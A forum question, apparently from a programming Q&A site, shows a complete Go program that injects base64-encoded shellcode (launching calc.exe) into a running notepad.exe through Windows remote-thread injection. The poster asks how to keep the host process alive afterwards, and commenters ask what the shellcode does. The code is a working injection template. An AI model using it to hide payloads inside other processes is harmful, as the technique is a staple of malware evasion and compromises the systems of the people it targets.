# How to keep process running after remote process injection in Go

Tags: windows, go, security, winapi, shellcode

The b64sc is the variable to excute calc.exe and 14676 is the pid of notepad.exe.

When I run this code it can excute the calc but also close any process which I want to inject.

```
package main

import (
   "encoding/base64"
   "golg.org/x/sys/windows"
   "unsafe"
)

var (
   kernel32 = windows.NewLazySystemDLL("kernel32.dll")
   ntdll    = windows.NewLazySystemDLL("ntdll.dll")

   OpenProcess    = kernel32.NewProc("OpenProcess")
   VirtualAllocEx = kernel32.NewProc("VirtualAllocEx")
   WriteProcessMemory = kernel32.NewProc("WriteProcessMemory")
   CloseHandle          = kernel32.NewProc("CloseHandle")
   CreateRemoteThreadEx = kernel32.NewProc("CreateRemoteThreadEx")
)
var b64sc = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA "

func main() {
   sc, _ := base64.StdEncoding.DecodeString(b64sc)
   target_process, _, _ := OpenProcess.Call(0x0002|0x0008|0x0020|0x0010|0x0400, 0, 14676)
   remote_process_buffer, _, _ := VirtualAllocEx.Call(target_process, 0, uintptr(len(sc)), 0x3000, 0x40)
   WriteProcessMemory.Call(target_process, remote_process_buffer, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)), 0)
   CreateRemoteThreadEx.Call(target_process, 0, 0, remote_process_buffer, 0, 0, 0)
   CloseHandle.Call(target_process)

}
```

Comment: What is the injected code supposed to do? How do you know it's correct?

Comment: excute calc.exe and keep notepad.exe running.

Comment: But how does it do that exactly?